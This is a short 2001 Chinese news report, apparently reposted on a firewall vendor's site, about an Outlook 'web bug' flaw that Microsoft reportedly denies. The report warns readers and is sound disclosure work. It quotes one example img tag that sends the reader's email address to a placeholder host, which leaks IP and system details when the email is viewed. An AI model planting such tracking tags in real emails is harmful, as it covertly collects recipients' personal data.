公司简介
安全方案
典型案例
产品报价
售后服务
软件下载
免费索取
防火墙知识普及

现在你所处的位置:首页-〉最新网络安全事件-〉

Outlook再现漏洞 微软拒绝承认

发布日期: 2001-8-30

来源:PCnews
--------------------------------------------------------------------------------

  近日,NT Help网站(一个专门揭露Windows XP缺陷的网站)的管理员George Roettger又发现了一个Outlook安全漏洞。而微软方面则拒绝承认此漏洞的存在,并且在新版本的Windows XP中也没有对此进行更改。

  此人同时提供了一个测试页(谨慎使用,后果自负),供用户测试此漏洞。你所要做的就是登录此页,添上你的email地址,然后用Outlook收信,信中会含有“网页BUG”,这些BUG可以使Outlook彻底出卖你,偷窃你的一些个人信息。

  这里我们所说的“网页BUG”指的是一些插入网页中的特殊标识符,这些标识符能够引起Outlook等程序的异常动作。就好象:img src="http://somesite.com/somepage?youremail@yourdomain.com。据介绍,此类网页BUG还有很多。

  你如果用Outlook或Outlook Express在网上浏览含有这种标识符的电子邮件(不用它开任何附件或点击任何链接,只是浏览一下),你的IP地址、操作系统版本、浏览器版本等大量信息都会暴露。


上一条  返回目录页  下一条